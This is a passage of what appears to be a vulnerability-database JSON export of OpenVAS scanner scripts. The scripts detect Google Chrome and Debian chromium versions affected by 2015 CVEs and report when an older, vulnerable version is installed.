script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"42.0.2311.90\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 42.0.2311.90' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:14:07", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-02 Apr15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-3335", "CVE-2015-3336", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805468", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805468", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-02 Apr15 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805468\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-3335\", \"CVE-2015-3334\", \"CVE-2015-3333\", \"CVE-2015-1249\",\n \"CVE-2015-1247\", \"CVE-2015-1246\", \"CVE-2015-1244\", \"CVE-2015-1242\",\n \"CVE-2015-1241\", \"CVE-2015-1240\", \"CVE-2015-1238\", \"CVE-2015-1237\",\n \"CVE-2015-1236\", \"CVE-2015-1235\", \"CVE-2015-3336\");\n script_bugtraq_id(72715, 74227, 74225, 74221);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-21 18:46:52 +0530 (Tue, 21 Apr 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-02 Apr15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Missing address space usage limitation in the NaCl process.\n\n - Permissions for camera and microphone are merged into a single 'Media'\n permission instead of treated as two separate permission.\n\n - Flaw in the 'SearchEngineTabHelper::OnPageHasOSDD' function in\n ui/search_engines/search_engine_tab_helper.cc script that is triggered when\n handling URLs for OpenSearch descriptor.\n\n - An unspecified out-of-bounds read flaw in Blink.\n\n - A flaw related to WebSocket connections as HSTS\n (HTTP Strict Transport Security) is not enforced.\n\n - A type confusion flaw in the 'ReduceTransitionElementsKind' function in\n hydrogen-check-elimination.cc script related to HTransitionElementsKind\n handling.\n\n - A Tap-Jacking flaw that is triggered as certain synthetic Tap events aren't\n preceded by TapDown events.\n\n - An unspecified out-of-bounds read flaw in WebGL related to handling of ES3\n commands.\n\n - An unspecified out-of-bounds write flaw in Skia.\n\n - A use-after-free error in content/renderer/render_frame_impl.cc script.\n\n - A flaw in the 'MediaElementAudioSourceNode::process' function in\n modules/webaudio/MediaElementAudioSourceNode.cpp script.\n\n - An unspecified flaw in the HTML Parser.\n\n - Multiple unspecified Vulnerabilities\n\n - Browser does not confirm with the user before setting\n CONTENT_SETTINGS_TYPE_FULLSCREEN and CONTENT_SETTINGS_TYPE_MOUSELOCK.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security restrictions, conduct row-hammer attacks,\n obtain sensitive data, trigger unintended UI actions via crafted dimension,\n cause a denial of service and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 42.0.2311.90 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 42.0.2311.90 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.com/2015/04/stable-channel-update_14.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"42.0.2311.90\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 42.0.2311.90' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:14:07", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-04-21T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-02 Apr15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-3335", "CVE-2015-3336", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805469", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805469", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-02 Apr15 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805469\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-3335\", \"CVE-2015-3334\", \"CVE-2015-3333\", \"CVE-2015-1249\",\n \"CVE-2015-1247\", \"CVE-2015-1246\", \"CVE-2015-1244\", \"CVE-2015-1242\",\n \"CVE-2015-1241\", \"CVE-2015-1240\", \"CVE-2015-1238\", \"CVE-2015-1237\",\n \"CVE-2015-1236\", \"CVE-2015-1235\", \"CVE-2015-3336\");\n script_bugtraq_id(72715, 74227, 74225, 74221);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-21 18:47:21 +0530 (Tue, 21 Apr 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-02 Apr15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Missing address space usage limitation in the NaCl process.\n\n - Permissions for camera and microphone are merged into a single 'Media'\n permission instead of treated as two separate permission.\n\n - Flaw in the 'SearchEngineTabHelper::OnPageHasOSDD' function in\n ui/search_engines/search_engine_tab_helper.cc script that is triggered when\n handling URLs for OpenSearch descriptor.\n\n - An unspecified out-of-bounds read flaw in Blink.\n\n - A flaw related to WebSocket connections as HSTS\n (HTTP Strict Transport Security) is not enforced.\n\n - A type confusion flaw in the 'ReduceTransitionElementsKind' function in\n hydrogen-check-elimination.cc script related to HTransitionElementsKind\n handling.\n\n - A Tap-Jacking flaw that is triggered as certain synthetic Tap events aren't\n preceded by TapDown events.\n\n - An unspecified out-of-bounds read flaw in WebGL related to handling of ES3\n commands.\n\n - An unspecified out-of-bounds write flaw in Skia.\n\n - A use-after-free error in content/renderer/render_frame_impl.cc script.\n\n - A flaw in the 'MediaElementAudioSourceNode::process' function in\n modules/webaudio/MediaElementAudioSourceNode.cpp script.\n\n - An unspecified flaw in the HTML Parser.\n\n - Multiple unspecified Vulnerabilities\n\n - Browser does not confirm with the user before setting\n CONTENT_SETTINGS_TYPE_FULLSCREEN and CONTENT_SETTINGS_TYPE_MOUSELOCK.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security restrictions, conduct row-hammer attacks,\n obtain sensitive data, trigger unintended UI actions via crafted dimension,\n cause a denial of service and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 42.0.2311.90 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 42.0.2311.90 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.com/2015/04/stable-channel-update_14.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"42.0.2311.90\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 42.0.2311.90' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:03", "description": "Several vulnerabilities were discovered in the chromium web browser:\n\nCVE-2015-1243\nSaif El-Sherei discovered a use-after-free issue.\n\nCVE-2015-1250\nThe chrome 42 team found and fixed multiple issues during internal\nauditing.", "cvss3": {}, "published": "2015-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3242-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703242", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703242", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3242.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3242-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703242\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_name(\"Debian Security Advisory DSA 3242-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-30 00:00:00 +0200 (Thu, 30 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3242.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.135-1~deb8u1.\n\nFor the testing distribution (stretch), this problem will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 42.0.2311.135-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the chromium web browser:\n\nCVE-2015-1243\nSaif El-Sherei discovered a use-after-free issue.\n\nCVE-2015-1250\nThe chrome 42 team found and fixed multiple issues during internal\nauditing.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"42.0.2311.135-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"42.0.2311.135-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"42.0.2311.135-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"42.0.2311.135-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"42.0.2311.135-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:06", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-04T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 May15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805376", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_google_chrome_mult_vuln01_may15_lin.nasl 2015-05-04 14:23:48 +0530 May$\n#\n# Google Chrome Multiple Vulnerabilities-01 May15 (Linux)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805376\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1250\", \"CVE-2015-1243\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-04 14:23:48 +0530 (Mon, 04 May 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 May15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A Use-after-free flaw in the MutationObserver::disconnect function\n in core/dom/MutationObserver.cpp script in the DOM implementation in Blink.\n\n - Multiple Unspecified flaws due to unknown vectors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial-of-service condition and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 42.0.2311.135 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 42.0.2311.135 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/04/stable-channel-update_28.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)) exit(0);\n\nif(version_is_less(version:chromeVer, test_version:\"42.0.2311.135\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 42.0.2311.135' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:56", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-04T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 May15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805377", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_google_chrome_mult_vuln01_may15_macosx.nasl 2015-05-04 14:23:48 +0530 May$\n#\n# Google Chrome Multiple Vulnerabilities-01 May15 (Mac OS X)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805377\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1250\", \"CVE-2015-1243\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-04 14:23:48 +0530 (Mon, 04 May 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 May15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A Use-after-free flaw in the MutationObserver::disconnect function\n in core/dom/MutationObserver.cpp script in the DOM implementation in Blink.\n\n - Multiple Unspecified flaws due to unknown vectors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial-of-service condition and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 42.0.2311.135 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 42.0.2311.135 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/04/stable-channel-update_28.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)) exit(0);\n\nif(version_is_less(version:chromeVer, test_version:\"42.0.2311.135\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 42.0.2311.135' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:54:02", "description": "Several vulnerabilities were discovered in the chromium web browser:\n\nCVE-2015-1243 \nSaif El-Sherei discovered a use-after-free issue.\n\nCVE-2015-1250 \nThe chrome 42 team found and fixed multiple issues during internal\nauditing.", "cvss3": {}, "published": "2015-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3242-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703242", "href": "http://plugins.openvas.org/nasl.php?oid=703242", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3242.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3242-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703242);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1243\", \"CVE-2015-1250\");\n script_name(\"Debian Security Advisory DSA 3242-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-04-30 00:00:00 +0200 (Thu, 30 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3242.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 42.0.2311.135-1~deb8u1.\n\nFor the testing distribution (stretch), this problem will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 42.0.2311.135-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the chromium web browser:\n\nCVE-2015-1243 \nSaif El-Sherei discovered a use-after-free issue.\n\nCVE-2015-1250 \nThe chrome 42 team found and fixed multiple issues during internal\nauditing.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"42.0.2311.135-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"42.0.2311.135-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"42.0.2311.135-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"42.0.2311.135-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"42.0.2311.135-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-19T22:13:27", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-04T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 May15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805375", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805375", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_google_chrome_mult_vuln01_may15_win.nasl 2015-05-04 14:23:48 +0530 May$\n#\n# Google Chrome Multiple Vulnerabilities-01 May15 (Windows)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# 